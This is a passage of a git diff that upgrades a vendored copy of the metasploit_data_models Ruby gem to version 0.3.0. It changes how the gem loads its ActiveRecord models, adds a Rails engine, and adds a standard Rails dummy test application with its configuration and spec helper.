"metasploit_data_models/validators/ip_format_validator" -require "metasploit_data_models/validators/password_is_strong_validator" +# +# Project +# +require 'mdm' +require 'metasploit_data_models/version' +require 'metasploit_data_models/serialized_prefs' +require 'metasploit_data_models/base64_serializer' +require 'metasploit_data_models/validators/ip_format_validator' +require 'metasploit_data_models/validators/password_is_strong_validator' -# Declare the (blessedly short) common namespace for the ActiveRecord classes -module Mdm; end +# Only include the Rails engine when using Rails. This allows the non-Rails projects, like metasploit-framework to use +# the models by calling MetasploitDataModels.require_models. +if defined? Rails + require 'metasploit_data_models/engine' +end module MetasploitDataModels - module ActiveRecordModels; end - - # Dynamically create AR classes if being included from Msf::DBManager - # otherwise, just make the modules available for arbitrary inclusion. - def self.included(base) - ar_mixins.each{|file| require file} - create_and_load_ar_classes if base.to_s == 'Msf::DBManager' + def self.models_pathname + root.join('app', 'models') end - # The code in each of these represents the basic structure of a correspondingly named - # ActiveRecord model class. Those classes are explicitly created in our Rails app - # for the commercial versions, and the functionality from the mixins is included - # into model classes directly. - # - # When not explicitly overloading the classes in your own files use MetasploitDataModels#create_and_load_ar_classes - # to dynamically generate ActiveRecord classes in the Mdm namespace. - def self.ar_mixins - models_dir = File.expand_path(File.dirname(__FILE__)) + "/metasploit_data_models/active_record_models" - Dir.glob("#{models_dir}/*.rb") - end + def self.require_models + models_globs = models_pathname.join('**', '*.rb') - # Dynamically create ActiveRecord descendant classes in the Mdm namespace - def self.create_and_load_ar_classes - ar_module_names.each do |cname| - class_str =<<-RUBY - class Mdm::#{cname} < ActiveRecord::Base - include MetasploitDataModels::ActiveRecordModels::#{cname} - end - RUBY - eval class_str, binding, __FILE__, __LINE__ # *slightly* more obvious stack trace + Dir.glob(models_globs) do |model_path| + require model_path end end - # Derive "constant" strings from the names of the files in - # lib/metasploit_data_models/active_record_models - def self.ar_module_names - ar_mixins.inject([]) do |array, path| - filename = File.basename(path).split(".").first - c_name = filename.classify - c_name << "s" if filename =~ /^[\w]+s$/ # classify can't do plurals - array << c_name - array - end - end + def self.root + unless instance_variable_defined? :@root + lib_pathname = Pathname.new(__FILE__).dirname + @root = lib_pathname.parent + end + + @root + end end + +lib_pathname = MetasploitDataModels.root.join('lib') +# has to work under 1.8.7, so can't use to_path +lib_path = lib_pathname.to_s +# Add path to gem's lib so that concerns for models are loaded correctly if models are reloaded +ActiveSupport::Dependencies.autoload_paths << lib_path +ActiveSupport::Dependencies.autoload_once_paths << lib_path diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb new file mode 100644 index 0000000000..27f7df2994 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb @@ -0,0 +1,7 @@ +require 'rails' + +module MetasploitDataModels + class Engine < Rails::Engine + + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb index e4d0997133..e68300cf0c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb @@ -1,3 +1,7 @@ module MetasploitDataModels - VERSION = "0.0.2" + # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}. At this time, the API + # is considered unstable because the database migrations are still in metasploit-framework and certain models may not + # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API + # the version should remain below 1.0.0 + VERSION = '0.3.0' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec index e04e223f5f..3a26fb1312 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec @@ -17,9 +17,10 @@ Gem::Specification.new do |s| s.require_paths = ["lib"] # ---- Dependencies ---- - s.add_development_dependency "rspec" - s.add_runtime_dependency "activerecord" - s.add_runtime_dependency "activesupport" - s.add_runtime_dependency "pg" - s.add_runtime_dependency "pry" + s.add_development_dependency 'rake' + + s.add_runtime_dependency 'activerecord' + s.add_runtime_dependency 'activesupport' + s.add_runtime_dependency 'pg' + s.add_runtime_dependency 'pry' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails new file mode 100644 index 0000000000..7514bd40b3 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails @@ -0,0 +1,8 @@ +#!/usr/bin/env ruby +# This command will automatically be run when you run "rails" with Rails 3 gems installed from the root of your application. + +ENGINE_ROOT = File.expand_path('../..', __FILE__) +ENGINE_PATH = File.expand_path('../../lib/metasploit_data_models/engine', __FILE__) + +require 'rails/all' +require 'rails/engine/commands' \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile new file mode 100644 index 0000000000..36458522cb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile @@ -0,0 +1,7 @@ +#!/usr/bin/env rake +# Add your own tasks in files placed in lib/tasks ending in .rake, +# for example lib/tasks/capistrano.rake, and they will automatically be available to Rake. + +require File.expand_path('../config/application', __FILE__) + +Dummy::Application.load_tasks diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js new file mode 100644 index 0000000000..9097d830e2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js @@ -0,0 +1,15 @@ +// This is a manifest file that'll be compiled into application.js, which will include all the files +// listed below. +// +// Any JavaScript/Coffee file within this directory, lib/assets/javascripts, vendor/assets/javascripts, +// or vendor/assets/javascripts of plugins, if any, can be referenced here using a relative path. +// +// It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the +// the compiled file. +// +// WARNING: THE FIRST BLANK LINE MARKS THE END OF WHAT'S TO BE PROCESSED, ANY BLANK LINE SHOULD +// GO AFTER THE REQUIRES BELOW. +// +//= require jquery +//= require jquery_ujs +//= require_tree . diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css new file mode 100644 index 0000000000..3192ec897b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css @@ -0,0 +1,13 @@ +/* + * This is a manifest file that'll be compiled into application.css, which will include all the files + * listed below. + * + * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets, + * or vendor/assets/stylesheets of plugins, if any, can be referenced here using a relative path. + * + * You're free to add application-wide styles to this file and they'll appear at the top of the + * compiled file, but it's generally better to create a new file per style scope. + * + *= require_self + *= require_tree . + */ diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb new file mode 100644 index 0000000000..e8065d9505 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb @@ -0,0 +1,3 @@ +class ApplicationController < ActionController::Base + protect_from_forgery +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb new file mode 100644 index 0000000000..de6be7945c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb @@ -0,0 +1,2 @@ +module ApplicationHelper +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb new file mode 100644 index 0000000000..4cab268465 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb @@ -0,0 +1,14 @@ + + + + Dummy + <%= stylesheet_link_tag "application", :media => "all" %> + <%= javascript_include_tag "application" %> + <%= csrf_meta_tags %> + + + +<%= yield %> + + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru new file mode 100644 index 0000000000..1989ed8d0c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru @@ -0,0 +1,4 @@ +# This file is used by Rack-based servers to start the application. + +require ::File.expand_path('../config/environment', __FILE__) +run Dummy::Application diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb new file mode 100644 index 0000000000..52720f259a --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb @@ -0,0 +1,61 @@ +require File.expand_path('../boot', __FILE__) + +require 'rails/all' + +Bundler.require +# require the engine being tested. In a non-dummy app this would be handled by the engine's gem being in the Gemfile +# for real app and Bundler.require requiring the gem. +require 'metasploit_data_models' + +module Dummy + class Application < Rails::Application + # Settings in config/environments/* take precedence over those specified here. + # Application configuration should go into files in config/initializers + # -- all .rb files in that directory are automatically loaded. + + # Custom directories with classes and modules you want to be autoloadable. + # config.autoload_paths += %W(#{config.root}/extras) + + # Only load the plugins named here, in the order given (default is alphabetical). + # :all can be used as a placeholder for all plugins not explicitly named. + # config.plugins = [ :exception_notification, :ssl_requirement, :all ] + + # Activate observers that should always be running. + # config.active_record.observers = :cacher, :garbage_collector, :forum_observer + + # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone. + # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC. + # config.time_zone = 'Central Time (US & Canada)' + + # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded. + # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s] + # config.i18n.default_locale = :de + + # Configure the default encoding used in templates for Ruby 1.9. + config.encoding = "utf-8" + + # Configure sensitive parameters which will be filtered from the log file. + config.filter_parameters += [:password] + + # Enable escaping HTML in JSON. + config.active_support.escape_html_entities_in_json = true + + # Use SQL instead of Active Record's schema dumper when creating the database. + # This is necessary if your schema can't be completely dumped by the schema dumper, + # like if you have constraints or database-specific column types + # config.active_record.schema_format = :sql + + # Enforce whitelist mode for mass assignment. + # This will create an empty whitelist of attributes available for mass-assignment for all models + # in your app. As such, your models will need to explicitly whitelist or blacklist accessible + # parameters by using an attr_accessible or attr_protected declaration. + config.active_record.whitelist_attributes = true + + # Enable the asset pipeline + config.assets.enabled = true + + # Version of your assets, change this if you want to expire all your assets + config.assets.version = '1.0' + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb new file mode 100644 index 0000000000..eba0681370 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb @@ -0,0 +1,10 @@ +require 'rubygems' +gemfile = File.expand_path('../../../../Gemfile', __FILE__) + +if File.exist?(gemfile) + ENV['BUNDLE_GEMFILE'] = gemfile + require 'bundler' + Bundler.setup +end + +$:.unshift File.expand_path('../../../../lib', __FILE__) \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example new file mode 100644 index 0000000000..d0b42964c0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example @@ -0,0 +1,22 @@ +# Please only use postgresql bound to a TCP port. +development: &pgsql + adapter: postgresql + database: metasploit_data_models_development + username: metasploit_data_models_development + password: __________________________________ + host: localhost + port: 5432 + pool: 5 + timeout: 5 + +# Warning: The database defined as "test" will be erased and +# re-generated from your development database when you run "rake". +# Do not set this db to the same as development or production. +# +# Note also, sqlite3 is totally unsupported by Metasploit now. +test: + <<: *pgsql + database: metasploit_data_models_test + username: metasploit_data_models_test + password: ___________________________ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb new file mode 100644 index 0000000000..3da5eb91d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb @@ -0,0 +1,5 @@ +# Load the rails application +require File.expand_path('../application', __FILE__) + +# Initialize the rails application +Dummy::Application.initialize! diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb new file mode 100644 index 0000000000..82c74d1541 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb @@ -0,0 +1,37 @@ +Dummy::Application.configure do + # Settings specified here will take precedence over those in config/application.rb + + # In the development environment your application's code is reloaded on + # every request. This slows down response time but is perfect for development + # since you don't have to restart the web server when you make code changes. + config.cache_classes = false + + # Log error messages when you accidentally call methods on nil. + config.whiny_nils = true + + # Show full error reports and disable caching + config.consider_all_requests_local = true + config.action_controller.perform_caching = false + + # Don't care if the mailer can't send + config.action_mailer.raise_delivery_errors = false + + # Print deprecation notices to the Rails logger + config.active_support.deprecation = :log + + # Only use best-standards-support built into browsers + config.action_dispatch.best_standards_support = :builtin + + # Raise exception on mass assignment protection for Active Record models + config.active_record.mass_assignment_sanitizer = :strict + + # Log the query plan for queries taking more than this (works + # with SQLite, MySQL, and PostgreSQL) + config.active_record.auto_explain_threshold_in_seconds = 0.5 + + # Do not compress assets + config.assets.compress = false + + # Expands the lines which load the assets + config.assets.debug = true +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb new file mode 100644 index 0000000000..bdac56a713 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb @@ -0,0 +1,67 @@ +Dummy::Application.configure do + # Settings specified here will take precedence over those in config/application.rb + + # Code is not reloaded between requests + config.cache_classes = true + + # Full error reports are disabled and caching is turned on + config.consider_all_requests_local = false + config.action_controller.perform_caching = true + + # Disable Rails's static asset server (Apache or nginx will already do this) + config.serve_static_assets = false + + # Compress JavaScripts and CSS + config.assets.compress = true + + # Don't fallback to assets pipeline if a precompiled asset is missed + config.assets.compile = false + + # Generate digests for assets URLs + config.assets.digest = true + + # Defaults to nil and saved in location specified by config.assets.prefix + # config.assets.manifest = YOUR_PATH + + # Specifies the header that your server uses for sending files + # config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache + # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx + + # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. + # config.force_ssl = true + + # See everything in the log (default is :info) + # config.log_level = :debug + + # Prepend all log lines with the following tags + # config.log_tags = [ :subdomain, :uuid ] + + # Use a different logger for distributed setups + # config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new) + + # Use a different cache store in production + # config.cache_store = :mem_cache_store + + # Enable serving of images, stylesheets, and JavaScripts from an asset server + # config.action_controller.asset_host = "http://assets.example.com" + + # Precompile additional assets (application.js, application.css, and all non-JS/CSS are already added) + # config.assets.precompile += %w( search.js ) + + # Disable delivery errors, bad email addresses will be ignored + # config.action_mailer.raise_delivery_errors = false + + # Enable threaded mode + # config.threadsafe! + + # Enable locale fallbacks for I18n (makes lookups for any locale fall back to + # the I18n.default_locale when a translation can not be found) + config.i18n.fallbacks = true + + # Send deprecation notices to registered listeners + config.active_support.deprecation = :notify + + # Log the query plan for queries taking more than this (works + # with SQLite, MySQL, and PostgreSQL) + # config.active_record.auto_explain_threshold_in_seconds = 0.5 +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb new file mode 100644 index 0000000000..f1a4814175 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb @@ -0,0 +1,37 @@ +Dummy::Application.configure do + # Settings specified here will take precedence over those in config/application.rb + + # The test environment is used exclusively to run your application's + # test suite. You never need to work with it otherwise. Remember that + # your test database is "scratch space" for the test suite and is wiped + # and recreated between test runs. Don't rely on the data there! + config.cache_classes = true + + # Configure static asset server for tests with Cache-Control for performance + config.serve_static_assets = true + config.static_cache_control = "public, max-age=3600" + + # Log error messages when you accidentally call methods on nil + config.whiny_nils = true + + # Show full error reports and disable caching + config.consider_all_requests_local = true + config.action_controller.perform_caching = false + + # Raise exceptions instead of rendering exception templates + config.action_dispatch.show_exceptions = false + + # Disable request forgery protection in test environment + config.action_controller.allow_forgery_protection = false + + # Tell Action Mailer not to deliver emails to the real world. + # The :test delivery method accumulates sent emails in the + # ActionMailer::Base.deliveries array. + config.action_mailer.delivery_method = :test + + # Raise exception on mass assignment protection for Active Record models + config.active_record.mass_assignment_sanitizer = :strict + + # Print deprecation notices to the stderr + config.active_support.deprecation = :stderr +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb new file mode 100644 index 0000000000..59385cdf37 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb @@ -0,0 +1,7 @@ +# Be sure to restart your server when you modify this file. + +# You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces. +# Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ } + +# You can also remove all the silencers if you're trying to debug a problem that might stem from framework code. +# Rails.backtrace_cleaner.remove_silencers! diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb new file mode 100644 index 0000000000..5d8d9be237 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb @@ -0,0 +1,15 @@ +# Be sure to restart your server when you modify this file. + +# Add new inflection rules using the following format +# (all these examples are active by default): +# ActiveSupport::Inflector.inflections do |inflect| +# inflect.plural /^(ox)$/i, '\1en' +# inflect.singular /^(ox)en/i, '\1' +# inflect.irregular 'person', 'people' +# inflect.uncountable %w( fish sheep ) +# end +# +# These inflection rules are supported but not enabled by default: +# ActiveSupport::Inflector.inflections do |inflect| +# inflect.acronym 'RESTful' +# end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb new file mode 100644 index 0000000000..72aca7e441 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb @@ -0,0 +1,5 @@ +# Be sure to restart your server when you modify this file. + +# Add new mime types for use in respond_to blocks: +# Mime::Type.register "text/richtext", :rtf +# Mime::Type.register_alias "text/html", :iphone diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb new file mode 100644 index 0000000000..ef7d7a05a3 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb @@ -0,0 +1,7 @@ +# Be sure to restart your server when you modify this file. + +# Your secret key for verifying the integrity of signed cookies. +# If you change this key, all old signed cookies will become invalid! +# Make sure the secret is at least 30 characters and all random, +# no regular words or you'll be exposed to dictionary attacks. +Dummy::Application.config.secret_token = 'f04f565f9a4db0f0af88f4bd8b79952d139b02434b889a7c7bb3fe83405e9032409bd16bca7b0d7d68a8b119b6ddfd31b17d19155cd699a27e19a48bd05eb200' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb new file mode 100644 index 0000000000..952473ff9a --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb @@ -0,0 +1,8 @@ +# Be sure to restart your server when you modify this file. + +Dummy::Application.config.session_store :cookie_store, key: '_dummy_session' + +# Use the database for sessions instead of the cookie-based default, +# which shouldn't be used to store highly confidential information +# (create the session table with "rails generate session_migration") +# Dummy::Application.config.session_store :active_record_store diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb new file mode 100644 index 0000000000..999df20181 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb @@ -0,0 +1,14 @@ +# Be sure to restart your server when you modify this file. +# +# This file contains settings for ActionController::ParamsWrapper which +# is enabled by default. + +# Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array. +ActiveSupport.on_load(:action_controller) do + wrap_parameters format: [:json] +end + +# Disable root element in JSON by default. +ActiveSupport.on_load(:active_record) do + self.include_root_in_json = false +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb new file mode 100644 index 0000000000..1daf9a4121 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb @@ -0,0 +1,2 @@ +Rails.application.routes.draw do +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html new file mode 100644 index 0000000000..9a48320a5f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html @@ -0,0 +1,26 @@ + + + + The page you were looking for doesn't exist (404) + + + + + +

+

The page you were looking for doesn't exist.

+

You may have mistyped the address or the page may have moved.

+
+ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html new file mode 100644 index 0000000000..83660ab187 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html @@ -0,0 +1,26 @@ + + + + The change you wanted was rejected (422) + + + + + +
+

The change you wanted was rejected.

+

Maybe you tried to change something you didn't have access to.

+
+ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html new file mode 100644 index 0000000000..f3648a0dbc --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html @@ -0,0 +1,25 @@ + + + + We're sorry, but something went wrong (500) + + + + + +
+

We're sorry, but something went wrong.

+
+ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails new file mode 100755 index 0000000000..f8da2cffd4 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails @@ -0,0 +1,6 @@ +#!/usr/bin/env ruby +# This command will automatically be run when you run "rails" with Rails 3 gems installed from the root of your application. + +APP_PATH = File.expand_path('../../config/application', __FILE__) +require File.expand_path('../../config/boot', __FILE__) +require 'rails/commands' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb index b25a475b78..66d1de6804 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb @@ -1 +1,24 @@ -require File.expand_path(File.dirname(__FILE__) + "/../lib/msf_models") +# Configure Rails Environment +ENV['RAILS_ENV'] = 'test' + +require File.expand_path('../dummy/config/environment.rb', __FILE__) + +require 'rubygems' +require 'bundler' +Bundler.setup(:default, :test) +Bundler.require(:default, :test) + +# full backtrace in logs so its easier to trace errors +Rails.backtrace_cleaner.remove_silencers! + +# Requires supporting ruby files with custom matchers and macros, etc, +# in spec/support/ and its subdirectories. +support_glob = MetasploitDataModels.root.join('spec', 'support', '**', '*.rb') + +Dir.glob(support_glob) do |path| + require path +end + +RSpec.configure do |config| + config.mock_with :rspec +end diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec index a6525c2224..7b728268c3 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.0.2.43DEV" + s.version = "0.3.0" - s.required_rubygems_version = Gem::Requirement.new("> 1.3.1") if s.respond_to? :required_rubygems_version= + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2012-08-16" + s.date = "2012-11-01" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] @@ -20,20 +20,20 @@ 